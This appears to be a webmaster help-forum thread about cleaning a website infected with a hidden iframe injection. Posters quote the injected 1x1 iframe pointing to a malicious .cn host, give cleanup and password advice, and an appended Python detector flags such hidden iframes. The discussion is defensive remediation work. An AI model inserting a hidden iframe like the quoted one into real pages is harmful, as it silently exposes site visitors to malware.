The following is located at the bottom of the page and is visible through Web-sniffer.net. Other pages are affected as well.
www .thissenceilingdesign .com/testimonials1 .htm
< if ram e frameborder=0 border=0 height=1 width=1 src =“http ://glondis .cn /in. cgi?3” />
Dasient also flagged the following as suspected malicious code, but someone else will have to take a look to try to determine why.
www .thissenceilingdesign .com/sidebar .js
How are you viewing your files? You should be checking the versions that are on the server and not your local computer.
You may find the following resources helpful.
Resources:
Tips for Cleaning & Securing your Website
How to remove the ‘This site may harm your computer’
Google Webmaster Tools
Google MalwareFAQ and screenshot for ‘Request a Review’
Hello :-),
Jaal Scan ID # 823034-157 output
Malicious code detected on line 310 of http://www.thissenceilingdesign.com/testimonials1.htm starts with
<!—iframe frameborder=0 border=0 height=1 width=1 src="http://glondis.cn/in.cgi?>
Please look at the copy of the page on the server, if you cannot locate this code, it is probably being injected at runtime, when a user is requesting the page. It might be useful to then wipe out the hosting directory and check for malware, on the server and in the backend database. You can also ask for help from your hosting provider. Please check out other pages too.
If you have any specific issues feel free to ask for help.
Also, I am collecting info from people affected by attacks like this. If it would be possible for you to share your experience, could you kindly shoot me a mail at a.banerje e @ s top the hac ker .com (please remove the spaces).
We also provide vulnerability identification and mitigation services to help prevent websites from being infected in the first place.
Hope this helps,
-A
Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
www.stopthehacker.com
Jaal: Protecting the Internet, one website at a time™
EDIT: apologies for the duplicate :-)
Anirban … can you shed any light on why Dasient identified the javascript file as “suspected?”
http://wam.dasient.com/wam/diagnose?URL=www.thissenceilingdesign.com&scan_id=18993
Edit: Anirban … I’m going to take a nap now … I’ll stay out of your way. :-D
@Kaleh
Probably a false positive or because it references another page which has the iframe embedded in it. :-) The code does not seem to be malicious outright.
Hope this helped,
-A
PS: you sleep! no way.. judging by your activity on this group alone. It's good to have a strong active community.
Ok…I wiped out all the data on the server, uploaded my backup but still get the sidebar.js as detected, the other infections are gone…any idea?
I have 3 root folders for my 3 websites on a server, do I only need to wipe out the affected website folder or everything?
You may not need to wipe out everything. However, it would be prudent to understand what let this injection happen. In quite a lot of cases I have worked on, people think that wiping out directories works ... and then they get hit a day later.
What do you mean when you say “the code is not visible”? Have you searched the html on the server?
-A
@wthissen
The sidebar.js was only listed as “suspected” instead of “known.” If a scanning tool identifies something as suspicious, you just dig a little deeper to make a judgement call as to whether it is a real issue or not.
You might want to ignore the javascript file for now and go ahead and “Request a Review” through Webmaster Tools (previously referenced.)
In addition to reviewing the other documents and discussing with your web-host how this may have happened, you may want to scan your local PC for infection. A number of the more recent web-site infections are the result of malware on the local PC capturing FTP credentials. Others have reported that [ AVG, Avira OR Avast ] along with [ Malwarebytes Anti-malware ] often detect and remove such malware. Some of the other tried and true anti-virus products are not detecting the problem on the local computer. So … check your PC and change your passwords, just in case stolen credentials are the cause of the web-site hack.
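Added example, not part of the original thread or any poster's code: a small Python check for the kind of injection reported above, a 1x1 iframe loading from another host, that reports the line number in each page so the server copy can be inspected. The function names, the `TINY` threshold and the sample page with its placeholder hosts are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

TINY = 2  # assumption: width/height at or below this many pixels counts as hidden


class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are tiny or CSS-hidden and load from another host."""

    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host.lower()
        self.findings = []  # (line number, src)

    def handle_starttag(self, tag, attrs):
        # Also reached for self-closing <iframe ... /> via handle_startendtag.
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        external = bool(host) and host != self.own_host
        if external and (self._tiny(a) or self._css_hidden(a)):
            self.findings.append((self.getpos()[0], a["src"]))

    @staticmethod
    def _tiny(a):
        dims = (a.get("width", ""), a.get("height", ""))
        return any(d.strip().isdecimal() and int(d) <= TINY for d in dims)

    @staticmethod
    def _css_hidden(a):
        style = a.get("style", "").replace(" ", "").lower()
        return "display:none" in style or "visibility:hidden" in style


def find_hidden_iframes(html, own_host):
    """Return [(line, src), ...] for suspicious iframes in one HTML document."""
    finder = HiddenIframeFinder(own_host)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page; hosts are placeholders, not taken from the thread.
SAMPLE = """<html><body>
<iframe width="560" height="315" src="http://video.example.org/embed/1"></iframe>
<iframe src="/local-widget.html" width=1 height=1></iframe>
<iframe frameborder=0 border=0 height=1 width=1 src="http://injected.example.invalid/in.cgi?3" />
</body></html>"""
```

Run `find_hidden_iframes` over the files as downloaded from the server and also over the HTML the site actually serves, since a clean file with a flagged response points to injection at request time.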
